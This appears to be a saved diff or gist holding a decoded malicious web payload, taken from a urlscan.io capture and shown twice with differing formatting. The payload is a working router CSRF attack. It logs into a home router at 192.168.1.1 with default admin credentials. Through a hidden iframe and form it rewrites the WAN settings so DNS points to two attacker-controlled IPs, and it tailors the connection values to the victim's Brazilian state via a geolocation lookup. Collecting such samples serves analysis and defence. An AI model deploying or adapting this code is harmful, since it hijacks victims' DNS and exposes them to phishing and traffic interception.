timb-machine · February 13, 2021 23:43
diff --git a/Router CSRF malware blob b/Router CSRF malware blob
 // Taken from https://urlscan.io/result/ce20fb52-b4d9-45dd-8034-fb9eae99350e#transactions:
 // Request 1 for loadtxt.php:
 // Blob 2 from response decoded with base64decode.org:

 <!DOCTYPE html>
 <html>
 <head>
 	<title></title>
 	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
 </head>
 <body>
 	<style>
 		.hide
        {
            position:absolute;
            top:-1px;
            left:-1px;
            width:0px;
            height:0px;
        }
 	</style>
 	<iframe name="frame2" class="hide"></iframe>
 	<form action="http://192.168.1.1/advWAN.cgi" method="POST" name="frm2" target="frame2">
 		<input type="hidden" name="tAction" value="editApply">
 		<input type="hidden" name="viewPage" value="multiWANCfg">
 		<input type="hidden" name="action" value="edit">
 		<input type="hidden" name="idx" value="0">
 		<input type="hidden" name="icmpReply" value="0">
 		<input type="hidden" name="proxyArp" value="0">
 		<input type="hidden" name="wanMac" value="00%3A00%3A00%3A00%3A00%3A00">
 		<input type="hidden" name="wanEnc" value="PPP">
 		<input type="hidden" name="isPpp" value="1">
 		<input type="hidden" name="cmode" value="2">
 		<input type="hidden" name="vpi">
 		<input type="hidden" name="vci">
 		<input type="hidden" name="PPP_ConnectionTrigger" value="0">
 		<input type="hidden" name="connState" value="1">
 		<input type="hidden" name="ipProtocol" value="0">
 		<input type="hidden" name="connName" value="WAN1">
 		<input type="hidden" name="connType" value="1">
 		<input type="hidden" name="NATEnabled" value="1">
 		<input type="hidden" name="addrType" value="1">
 		<input type="hidden" name="gateway" value="192.168.1.1">
 		<input type="hidden" name="pppMaxMRUSize" value="1492">
 		<input type="hidden" name="pppServiceName" value="">
 		<input type="hidden" name="pppACName" value="">
 		<input type="hidden" name="pppLcpInterval" value="10">
 		<input type="hidden" name="dnsEnabled" value="1">
 		<input type="hidden" name="dns1" value="45.62.244.95">
 		<input type="hidden" name="dns2" value="104.233.73.215">
 		<input type="hidden" name="macAddress1" value="00">
 		<input type="hidden" name="macAddress2" value="00">
 		<input type="hidden" name="macAddress3" value="00">
 		<input type="hidden" name="macAddress4" value="00">
 		<input type="hidden" name="macAddress5" value="00">
 		<input type="hidden" name="macAddress6" value="00">
 	</form>
 	<script>
 			function sfrDns()
 			{
 				var counterInjDns = 0;

 				for (var i = 0; i == 1; i++)
 				{
 					location.reload();
 					counterInjDns = 1;
 				}

 				if (counterInjDns == 1)
 				{
 					document.frm2.submit();
 				}
 			}
 			function authDns()
 			{
 				$.ajax({
 					url: 'http://192.168.1.1/login.cgi?isSubmit=1&username=YWRtaW4%3D&password=YWRtaW4%3D',
 					type: 'POST',
 					crossDomain: true,
 					dataType: 'jsonp',
 					async: true,
 					timeout: 1000,
 					success: function(data)
 					{
 						// do nothing it data...
 					},
 					complete: function(data)
 					{
 						// do nothing it data...

 						if (navigator.userAgent.indexOf("Safari") != -1)
 						{
 							sfrDns();
 						}

 						document.frm2.submit();
 					}
 				});
 			}

 		$.ajax({
            url: "http://ip-api.com/json/",
            complete: function(res){
                var data = JSON.parse(res.responseText);
                var state = data["regionName"];
                console.log(state);
 				if (state == "Rio Grande do Sul")
 				{
 					document.frm2["vpi"].value = "1";
 					document.frm2["vci"].value = "32";
 					authDns();
 				}
 				else if (state == "Acre" || state == "Federal District" || state == "Goias" || state == "Mato Grosso do Sul" || state == "Mato Grosso" || state == "Parana" || state == "Rondonia" || state == "Santa Catarina" )
 				{
 					document.frm2["vpi"].value = "0";
 					document.frm2["vci"].value = "35";
 					authDns();
 				}
 				else if (state == "Alagoas" || state == "Bahia" || state == "Ceara" || state == "Espirito Santo" || state == "Maranhao" || state == "Minas Gerais" || state == "Para" || state == "Paraíba" || state ==  "Pernambuco" || state == "Rio de Janeiro" || state == "Rio Grande do Norte" || state == "Sergipe")
 				{
 					document.frm2["vpi"].value = "0";
 					document.frm2["vci"].value = "33";
 					authDns();
 				}
 				else if (state == "Sao Paulo")
 				{
 					document.frm2["vpi"].value = "8";
 					document.frm2["vci"].value = "35";
 					authDns();
 				}
            }
        });
 		// 2
 	</script>
 </body>
 </html>
	// Taken from https://urlscan.io/result/ce20fb52-b4d9-45dd-8034-fb9eae99350e#transactions:
	// Request 1 for loadtxt.php:
	// Blob 2 from response decoded with base64decode.org:

	<!DOCTYPE html>
	<html>
	<head>
	<title></title>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
	</head>
	<body>
	<style>
	.hide
	{
	position:absolute;
	top:-1px;
	left:-1px;
	width:0px;
	height:0px;
	}
	</style>
	<iframe name="frame2" class="hide"></iframe>
	<form action="http://192.168.1.1/advWAN.cgi" method="POST" name="frm2" target="frame2">
	<input type="hidden" name="tAction" value="editApply">
	<input type="hidden" name="viewPage" value="multiWANCfg">
	<input type="hidden" name="action" value="edit">
	<input type="hidden" name="idx" value="0">
	<input type="hidden" name="icmpReply" value="0">
	<input type="hidden" name="proxyArp" value="0">
	<input type="hidden" name="wanMac" value="00%3A00%3A00%3A00%3A00%3A00">
	<input type="hidden" name="wanEnc" value="PPP">
	<input type="hidden" name="isPpp" value="1">
	<input type="hidden" name="cmode" value="2">
	<input type="hidden" name="vpi">
	<input type="hidden" name="vci">
	<input type="hidden" name="PPP_ConnectionTrigger" value="0">
	<input type="hidden" name="connState" value="1">
	<input type="hidden" name="ipProtocol" value="0">
	<input type="hidden" name="connName" value="WAN1">
	<input type="hidden" name="connType" value="1">
	<input type="hidden" name="NATEnabled" value="1">
	<input type="hidden" name="addrType" value="1">
	<input type="hidden" name="gateway" value="192.168.1.1">
	<input type="hidden" name="pppMaxMRUSize" value="1492">
	<input type="hidden" name="pppServiceName" value="">
	<input type="hidden" name="pppACName" value="">
	<input type="hidden" name="pppLcpInterval" value="10">
	<input type="hidden" name="dnsEnabled" value="1">
	<input type="hidden" name="dns1" value="45.62.244.95">
	<input type="hidden" name="dns2" value="104.233.73.215">
	<input type="hidden" name="macAddress1" value="00">
	<input type="hidden" name="macAddress2" value="00">
	<input type="hidden" name="macAddress3" value="00">
	<input type="hidden" name="macAddress4" value="00">
	<input type="hidden" name="macAddress5" value="00">
	<input type="hidden" name="macAddress6" value="00">
	</form>
	<script>
	function sfrDns()
	{
	var counterInjDns = 0;

	for (var i = 0; i == 1; i++)
	{
	location.reload();
	counterInjDns = 1;
	}

	if (counterInjDns == 1)
	{
	document.frm2.submit();
	}
	}
	function authDns()
	{
	$.ajax({
	url: 'http://192.168.1.1/login.cgi?isSubmit=1&username=YWRtaW4%3D&password=YWRtaW4%3D',
	type: 'POST',
	crossDomain: true,
	dataType: 'jsonp',
	async: true,
	timeout: 1000,
	success: function(data)
	{
	// do nothing it data...
	},
	complete: function(data)
	{
	// do nothing it data...

	if (navigator.userAgent.indexOf("Safari") != -1)
	{
	sfrDns();
	}

	document.frm2.submit();
	}
	});
	}

	$.ajax({
	url: "http://ip-api.com/json/",
	complete: function(res){
	var data = JSON.parse(res.responseText);
	var state = data["regionName"];
	console.log(state);
	if (state == "Rio Grande do Sul")
	{
	document.frm2["vpi"].value = "1";
	document.frm2["vci"].value = "32";
	authDns();
	}
	else if (state == "Acre" \|\| state == "Federal District" \|\| state == "Goias" \|\| state == "Mato Grosso do Sul" \|\| state == "Mato Grosso" \|\| state == "Parana" \|\| state == "Rondonia" \|\| state == "Santa Catarina" )
	{
	document.frm2["vpi"].value = "0";
	document.frm2["vci"].value = "35";
	authDns();
	}
	else if (state == "Alagoas" \|\| state == "Bahia" \|\| state == "Ceara" \|\| state == "Espirito Santo" \|\| state == "Maranhao" \|\| state == "Minas Gerais" \|\| state == "Para" \|\| state == "Paraíba" \|\| state == "Pernambuco" \|\| state == "Rio de Janeiro" \|\| state == "Rio Grande do Norte" \|\| state == "Sergipe")
	{
	document.frm2["vpi"].value = "0";
	document.frm2["vci"].value = "33";
	authDns();
	}
	else if (state == "Sao Paulo")
	{
	document.frm2["vpi"].value = "8";
	document.frm2["vci"].value = "35";
	authDns();
	}
	}
	});
	// 2
	</script>
	</body>
	</html>
No results found